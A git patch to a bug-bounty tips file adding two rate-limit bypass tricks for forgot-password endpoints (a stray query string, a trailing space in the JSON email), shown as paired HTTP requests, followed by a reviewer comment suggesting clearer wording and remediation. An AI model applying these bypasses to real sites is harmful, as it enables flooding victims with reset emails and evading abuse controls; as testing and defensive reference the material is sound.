From da84a9479b5b8997eb9f7b10ede7293b1b3c757a Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+MD15@users.noreply.github.com> Date: Sat, 19 Sep 2020 07:03:32 +0700 Subject: [PATCH] Bypass Rate Limit [2] Add 2 tips --- BypassRateLimit.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/BypassRateLimit.md b/BypassRateLimit.md index 7f1806b..403963d 100644 --- a/BypassRateLimit.md +++ b/BypassRateLimit.md @@ -45,3 +45,37 @@ Cookie: aaaaaaaaaaaaa email=victim@gmail.com ``` + +4. Add a random parameter on the last endpoint +``` +POST /ForgotPass.php HTTP/1.1 +Host: target.com +[...] + +email=victim@gmail.com +``` +Try this to bypass +``` +POST /ForgotPass.php?random HTTP/1.1 +Host: target.com +[...] + +email=victim@gmail.com +``` + +5. Add space after the parameter value +``` +POST /api/forgotpass HTTP/1.1 +Host: target.com +[...] + +{"email":"victim@gmail.com"} +``` +Try this to bypass +``` +POST /api/forgotpass HTTP/1.1 +Host: target.com +[...] + +{"email":"victim@gmail.com "} +```
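Review bot: Tips 4 and 5 give the request pairs but never state what differs between them or why the second request would be counted separately, and both headings are loosely worded. In tip 4, "Add a random parameter on the last endpoint" is in fact a query string appended to the path (`POST /ForgotPass.php?random`), and in tip 5 the space is placed inside the JSON string (`{"email":"victim@gmail.com "}`), not after the value. Suggest rewording the headings to match the examples and adding one sentence per tip naming the condition being tested, which from the examples appears to be a limiter keyed on the raw request URI (tip 4) or on the unnormalized email string (tip 5). A matching remediation line would make the entry usable in a report: count requests per route path with the query string excluded, and per email value after trimming and canonicalizing it. The new fences are also untagged; if the rest of the file tags its request blocks, these should follow suit.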